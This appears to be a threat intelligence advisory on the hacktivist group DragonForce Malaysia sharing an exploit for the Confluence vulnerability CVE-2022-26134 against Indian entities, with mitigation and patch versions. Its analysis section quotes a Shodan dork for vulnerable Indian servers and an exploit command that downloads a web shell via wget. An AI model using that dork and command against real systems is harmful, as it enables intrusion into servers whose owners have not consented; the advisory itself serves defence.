| Category:
Adversary Intelligence |
Threat Type:
Latest Attack |
Motivation:
Hacktivist |
Region:
India |
Source*:
D4 |
Executive Summary
| THREAT |
IMPACT |
MITIGATION |
- DragonForce Malaysia, the hacktivist group actively involved in targeting Indian entities, announced and shared the exploit CVE-2022-26134 which is a Confluence Server vulnerability.
- The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
|
- Actors can scan the internet for vulnerable instances of Confluence servers and leverage this vulnerability to launch attacks against significant Indian entities owned by both the government and private sectors.
|
- Look for patches and workarounds for the CVE-2022-26134.
- Audit and monitor anomalies in networks that could be indicators of possible compromise.
|
CloudSEK’s contextual AI digital risk platform
XVigil identified a post on a Telegram channel where the hacktivist group, DragonForce Malaysia has shared an exploit to CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability present in Confluence Server and Data Center.
DragonForce posting updates on their Telegram channel
Analysis and Attribution
Information from Cybercrime Forums
- On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.
Shodan Dork: http.favicon.hash:-305179312 country:"IN"
- The actor also shared a GitHub repository containing the script which can be downloaded and exploited using the following python command:
| CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php |
- Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
- A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
[caption id="attachment_20026" align="aligncenter" width="1350"]
Cybercrime forum post discussing CVE-2022-26134[/caption]
About DragonForce
- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
- The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
- This group owns and operates a forum where they post announcements and discuss their latest activities.
- The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
- The group has been conducting regular recruitment and promotion campaigns using Tiktok and Instagram reels.
DragonForce’s Official Communication Channels
| Forum |
: |
https[:]//dragonforce[.]io |
| Radio |
: |
https[:]//radio[.]dragonforce[.]io |
| Facebook |
: |
https[:]//fb[.]me/dragonforcedotio |
| Telegram |
: |
https[:]//t[.]me/dragonforceio |
| Twitter |
: |
https[:]//twitter[.]com/dragonforceio |
| Instagram |
: |
https[:]//instagram[.]com/dragonforceio |
| YouTube |
: |
https[:]//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw |
Information from OSINT
- Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
- A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
[caption id="attachment_20027" align="aligncenter" width="316"]
Source: Shodan[/caption]
- The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
[caption id="attachment_20028" align="aligncenter" width="1274"]
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)[/caption]
Impact & Mitigation
| Impact |
Mitigation |
- DragonForce is associated with multiple hacktivist groups for their campaign against Indian entities. This exploit gives them more opportunities to deface and dump the database of Indian entities.
- Attackers can use this vulnerability to execute commands remotely.
- Threat actors can leverage this opportunity to target victims and deploy ransomware.
- Potential loss of revenue, reputation, and intellectual property.
|
- The Confluence Server and Data Center versions need to be updated to the following patched versions:
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1
- Audit and monitor anomalies in networks that could be indicators of possible compromise.
|
References
